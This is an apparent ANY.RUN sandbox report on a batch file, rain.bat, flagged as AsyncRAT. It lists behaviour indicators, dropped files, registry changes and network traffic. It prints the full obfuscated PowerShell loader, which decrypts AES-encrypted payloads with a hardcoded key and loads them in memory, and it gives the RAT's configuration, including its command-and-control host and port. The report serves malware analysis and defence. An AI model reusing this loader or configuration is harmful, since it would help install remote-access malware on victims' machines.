File name:

rain.bat

Full analysis: https://app.any.run/tasks/8ee5a115-7ade-4c8b-9c04-b357de1330a8
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: January 19, 2024, 16:35:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
asyncrat
rat
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

F224D4174FE90EB1F75EBD0A0B91ADFB

SHA1:

052A642D0D71D0BDB7369E2CF120D1517C905EAB

SHA256:

66F273E6E122F7CDF0536864EACFDFBAF76634557165F7773C5B38E8C68BBF4B

SSDEEP:

1536:N1kdXY62fPuoafS4Sy+D0IN4hxFmr+7bagKpUE44MDfx:Nul2fPuoafS4W0a4h2r+7vKpUE44MDfx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • cmd.exe (PID: 1056)
      • cmd.exe (PID: 1972)

    • Starts PowerShell from an unusual location

      • cmd.exe (PID: 1056)
      • cmd.exe (PID: 1972)

    • ASYNCRAT has been detected (MUTEX)

      • lveka.bat.exe (PID: 2128)

    • ASYNCRAT has been detected (YARA)

      • lveka.bat.exe (PID: 2128)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • cmd.exe (PID: 1056)
      • cmd.exe (PID: 1972)

    • Application launched itself

      • cmd.exe (PID: 1776)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1776)
      • wscript.exe (PID: 1504)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 1776)
      • wscript.exe (PID: 1504)

    • The executable file from the user directory is run by the CMD process

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 1056)
      • cmd.exe (PID: 1972)

    • Reads security settings of Internet Explorer

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)

    • Checks Windows Trust Settings

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)

    • Starts itself from another location

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)

    • Starts POWERSHELL.EXE for commands execution

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)

    • The process executes VB scripts

      • rain.bat.exe (PID: 2072)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 1504)

    • Reads the Internet Settings

      • rain.bat.exe (PID: 2072)
      • wscript.exe (PID: 1504)
      • lveka.bat.exe (PID: 2128)

    • Connects to unusual port

      • lveka.bat.exe (PID: 2128)

  • INFO

    • Process checks Powershell version

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)

    • Checks supported languages

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)

    • Reads the computer name

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)

    • Reads the machine GUID from the registry

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)

    • Creates files or folders in the user directory

      • rain.bat.exe (PID: 2072)

    • Create files in a temporary directory

      • rain.bat.exe (PID: 2072)
      • lveka.bat.exe (PID: 2128)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AsyncRat

(PID) Process(2128) lveka.bat.exe
C2 (1)hicham157484.ddns.net
Ports (1)1994
BotnetDefault
Version0.5.7B
Options
AutoRunfalse
MutexAsyncMutex_6SI8OkPnk
InstallFolder%AppData%
BSoDfalse
AntiVMfalse
Certificates
Cert1MIIE8jCCAtqgAwIBAgIQALBkRuNCTqKtgapRE9OFfzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwOTA4MTcxOTA2WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIUy6LUKGJiU+zs5YT6bYIiVfLqLpcI+LU0E4VJAwp9P6glbx/vcYicyK5/XI6drbESmiYtKXn2S...
Server_SignatureU6yQDpYAiQhEe46iuFVN7EpkekpvYysTH1W+eRhh37rDTf9dC/g5VgaflSqm/M8fn8iz3fp1/I/C3GKkxbkrtP3P9Y9hIxzMM6/VRA3whE5RgzRbxsSnbZ8txE89x+P9tWIY6GxuAq0IrbGsU5d7CsCSopQSKYJ6/Vs2ZfR3+gTjafyuOFySodYInhhpU73i6vEP/MQL/ufuMWPcRL2Xjg34NhFRyFzUHXHvfhKk9zrS/NYNbO/dI+MNNWsc9DMx6gOVQsTZzSU6C7vy0FagzVGAoVdG8ItDOXY2VyC9dSWE...
Keys
AES620f154f8f8990c1a81c72e58222885dc066d6ea66f1e4be3b2bcfa06bdec3fd
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
8
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe rain.bat.exe no specs powershell.exe no specs wscript.exe no specs cmd.exe #ASYNCRAT lveka.bat.exe powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
668"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2072);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exerain.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1056C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\rain.bat" C:\Windows\System32\cmd.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1504"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\lveka.vbs" C:\Windows\System32\wscript.exerain.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1536"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2128);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exelveka.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1776C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\rain.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1972C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\lveka.bat" "C:\Windows\System32\cmd.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2072"C:\Users\admin\AppData\Local\Temp\rain.bat.exe" -w hidden -c $zCGe='InvOMHhokOMHheOMHh'.Replace('OMHh', '');$TNot='FirOMHhsOMHhtOMHh'.Replace('OMHh', '');$LhpA='CrOMHheateOMHhDecrOMHhyOMHhptOMHhorOMHh'.Replace('OMHh', '');$Fbab='ChaOMHhngeOMHhExOMHhteOMHhnsOMHhiOMHhoOMHhnOMHh'.Replace('OMHh', '');$LqGV='GetOMHhCurrOMHhentOMHhPrOMHhocOMHhessOMHh'.Replace('OMHh', '');$ltdc='MOMHhainOMHhMOMHhoOMHhdOMHhuleOMHh'.Replace('OMHh', '');$IZgb='ReaOMHhdLiOMHhneOMHhsOMHh'.Replace('OMHh', '');$fJiW='SOMHhpOMHhlitOMHh'.Replace('OMHh', '');$CTKP='LoaOMHhdOMHh'.Replace('OMHh', '');$MfGa='EntOMHhryOMHhPoinOMHhtOMHh'.Replace('OMHh', '');$uMSP='TOMHhransOMHhfOMHhorOMHhmFOMHhinalOMHhBloOMHhckOMHh'.Replace('OMHh', '');$iNLl='FroOMHhmBOMHhaOMHhse64OMHhStrOMHhiOMHhngOMHh'.Replace('OMHh', '');function BVGBJ($brXcq){$MAYiV=[System.Security.Cryptography.Aes]::Create();$MAYiV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MAYiV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MAYiV.Key=[System.Convert]::$iNLl('L1o/8p/B7L2d9hQ4eCLQLM4LrvLbmhevljh9BFLdQJ0=');$MAYiV.IV=[System.Convert]::$iNLl('G98UJ8fNWS+zLRcyqZYK/g==');$baaQL=$MAYiV.$LhpA();$OryHd=$baaQL.$uMSP($brXcq,0,$brXcq.Length);$baaQL.Dispose();$MAYiV.Dispose();$OryHd;}function tzHUu($brXcq){$yREyw=New-Object System.IO.MemoryStream(,$brXcq);$Uhvit=New-Object System.IO.MemoryStream;$JtfEX=New-Object System.IO.Compression.GZipStream($yREyw,[IO.Compression.CompressionMode]::Decompress);$JtfEX.CopyTo($Uhvit);$JtfEX.Dispose();$yREyw.Dispose();$Uhvit.Dispose();$Uhvit.ToArray();}$nhjCT=[System.Linq.Enumerable]::$TNot([System.IO.File]::$IZgb([System.IO.Path]::$Fbab([System.Diagnostics.Process]::$LqGV().$ltdc.FileName, $null)));$Wmvpd=$nhjCT.Substring(3).$fJiW(':');$vHgoc=tzHUu (BVGBJ ([Convert]::$iNLl($Wmvpd[0])));$EQpKu=tzHUu (BVGBJ ([Convert]::$iNLl($Wmvpd[1])));[System.Reflection.Assembly]::$CTKP([byte[]]$EQpKu).$MfGa.$zCGe($null,$null);[System.Reflection.Assembly]::$CTKP([byte[]]$vHgoc).$MfGa.$zCGe($null,$null);C:\Users\admin\AppData\Local\Temp\rain.bat.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\users\admin\appdata\local\temp\rain.bat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2128"C:\Users\admin\AppData\Roaming\lveka.bat.exe" -w hidden -c $zCGe='InvOMHhokOMHheOMHh'.Replace('OMHh', '');$TNot='FirOMHhsOMHhtOMHh'.Replace('OMHh', '');$LhpA='CrOMHheateOMHhDecrOMHhyOMHhptOMHhorOMHh'.Replace('OMHh', '');$Fbab='ChaOMHhngeOMHhExOMHhteOMHhnsOMHhiOMHhoOMHhnOMHh'.Replace('OMHh', '');$LqGV='GetOMHhCurrOMHhentOMHhPrOMHhocOMHhessOMHh'.Replace('OMHh', '');$ltdc='MOMHhainOMHhMOMHhoOMHhdOMHhuleOMHh'.Replace('OMHh', '');$IZgb='ReaOMHhdLiOMHhneOMHhsOMHh'.Replace('OMHh', '');$fJiW='SOMHhpOMHhlitOMHh'.Replace('OMHh', '');$CTKP='LoaOMHhdOMHh'.Replace('OMHh', '');$MfGa='EntOMHhryOMHhPoinOMHhtOMHh'.Replace('OMHh', '');$uMSP='TOMHhransOMHhfOMHhorOMHhmFOMHhinalOMHhBloOMHhckOMHh'.Replace('OMHh', '');$iNLl='FroOMHhmBOMHhaOMHhse64OMHhStrOMHhiOMHhngOMHh'.Replace('OMHh', '');function BVGBJ($brXcq){$MAYiV=[System.Security.Cryptography.Aes]::Create();$MAYiV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MAYiV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MAYiV.Key=[System.Convert]::$iNLl('L1o/8p/B7L2d9hQ4eCLQLM4LrvLbmhevljh9BFLdQJ0=');$MAYiV.IV=[System.Convert]::$iNLl('G98UJ8fNWS+zLRcyqZYK/g==');$baaQL=$MAYiV.$LhpA();$OryHd=$baaQL.$uMSP($brXcq,0,$brXcq.Length);$baaQL.Dispose();$MAYiV.Dispose();$OryHd;}function tzHUu($brXcq){$yREyw=New-Object System.IO.MemoryStream(,$brXcq);$Uhvit=New-Object System.IO.MemoryStream;$JtfEX=New-Object System.IO.Compression.GZipStream($yREyw,[IO.Compression.CompressionMode]::Decompress);$JtfEX.CopyTo($Uhvit);$JtfEX.Dispose();$yREyw.Dispose();$Uhvit.Dispose();$Uhvit.ToArray();}$nhjCT=[System.Linq.Enumerable]::$TNot([System.IO.File]::$IZgb([System.IO.Path]::$Fbab([System.Diagnostics.Process]::$LqGV().$ltdc.FileName, $null)));$Wmvpd=$nhjCT.Substring(3).$fJiW(':');$vHgoc=tzHUu (BVGBJ ([Convert]::$iNLl($Wmvpd[0])));$EQpKu=tzHUu (BVGBJ ([Convert]::$iNLl($Wmvpd[1])));[System.Reflection.Assembly]::$CTKP([byte[]]$EQpKu).$MfGa.$zCGe($null,$null);[System.Reflection.Assembly]::$CTKP([byte[]]$vHgoc).$MfGa.$zCGe($null,$null);C:\Users\admin\AppData\Roaming\lveka.bat.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\users\admin\appdata\roaming\lveka.bat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
AsyncRat
(PID) Process(2128) lveka.bat.exe
C2 (1)hicham157484.ddns.net
Ports (1)1994
BotnetDefault
Version0.5.7B
Options
AutoRunfalse
MutexAsyncMutex_6SI8OkPnk
InstallFolder%AppData%
BSoDfalse
AntiVMfalse
Certificates
Cert1MIIE8jCCAtqgAwIBAgIQALBkRuNCTqKtgapRE9OFfzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwOTA4MTcxOTA2WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIUy6LUKGJiU+zs5YT6bYIiVfLqLpcI+LU0E4VJAwp9P6glbx/vcYicyK5/XI6drbESmiYtKXn2S...
Server_SignatureU6yQDpYAiQhEe46iuFVN7EpkekpvYysTH1W+eRhh37rDTf9dC/g5VgaflSqm/M8fn8iz3fp1/I/C3GKkxbkrtP3P9Y9hIxzMM6/VRA3whE5RgzRbxsSnbZ8txE89x+P9tWIY6GxuAq0IrbGsU5d7CsCSopQSKYJ6/Vs2ZfR3+gTjafyuOFySodYInhhpU73i6vEP/MQL/ufuMWPcRL2Xjg34NhFRyFzUHXHvfhKk9zrS/NYNbO/dI+MNNWsc9DMx6gOVQsTZzSU6C7vy0FagzVGAoVdG8ItDOXY2VyC9dSWE...
Keys
AES620f154f8f8990c1a81c72e58222885dc066d6ea66f1e4be3b2bcfa06bdec3fd
Saltbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Total events
4 327
Read events
4 289
Write events
38
Delete events
0

Modification events

(PID) Process:(2072) rain.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2072) rain.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2072) rain.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2072) rain.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1504) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1504) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1504) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1504) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2128) lveka.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2128) lveka.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
2
Suspicious files
9
Text files
2
Unknown types
1

Dropped files

PID
Process
Filename
Type
2072rain.bat.exeC:\Users\admin\AppData\Roaming\lveka.vbstext
MD5:7FECB1428BF632FCF72CFD7ABFB85E61
SHA256:016CDA08111F285D40A0C198453851BCB9BF8D0181D20C8497B8F64E5363FA98
2128lveka.bat.exeC:\Users\admin\AppData\Local\Temp\m4gtip0i.w35.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
668powershell.exeC:\Users\admin\AppData\Local\Temp\lcijmvrg.aod.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2072rain.bat.exeC:\Users\admin\AppData\Roaming\lveka.battext
MD5:F224D4174FE90EB1F75EBD0A0B91ADFB
SHA256:66F273E6E122F7CDF0536864EACFDFBAF76634557165F7773C5B38E8C68BBF4B
668powershell.exeC:\Users\admin\AppData\Local\Temp\stadzmfv.yhf.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1972cmd.exeC:\Users\admin\AppData\Roaming\lveka.bat.exeexecutable
MD5:EB32C070E658937AA9FA9F3AE629B2B8
SHA256:70BA57FB0BF2F34B86426D21559F5F6D05C1268193904DE8E959D7B06CE964CE
1056cmd.exeC:\Users\admin\AppData\Local\Temp\rain.bat.exeexecutable
MD5:EB32C070E658937AA9FA9F3AE629B2B8
SHA256:70BA57FB0BF2F34B86426D21559F5F6D05C1268193904DE8E959D7B06CE964CE
2072rain.bat.exeC:\Users\admin\AppData\Local\Temp\5ipfb5r3.ele.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1536powershell.exeC:\Users\admin\AppData\Local\Temp\rb4hvkyy.pwx.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2128lveka.bat.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:6675EDE59684F4A119D2E5DA282AFBE6
SHA256:5026C5EE8FA9ACB21718BF1FAD563C0A3FD5BC79327611FDF9C4ABD2647CE829
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
16
DNS requests
5
Threats
4

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
2128
lveka.bat.exe
45.74.34.32:1994
hicham157484.ddns.net
M247 Ltd
US
unknown

DNS requests

Domain
IP
Reputation
hicham157484.ddns.net
  • 45.74.34.32
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
1080
svchost.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
1080
svchost.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
1080
svchost.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
1080
svchost.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
rain.bat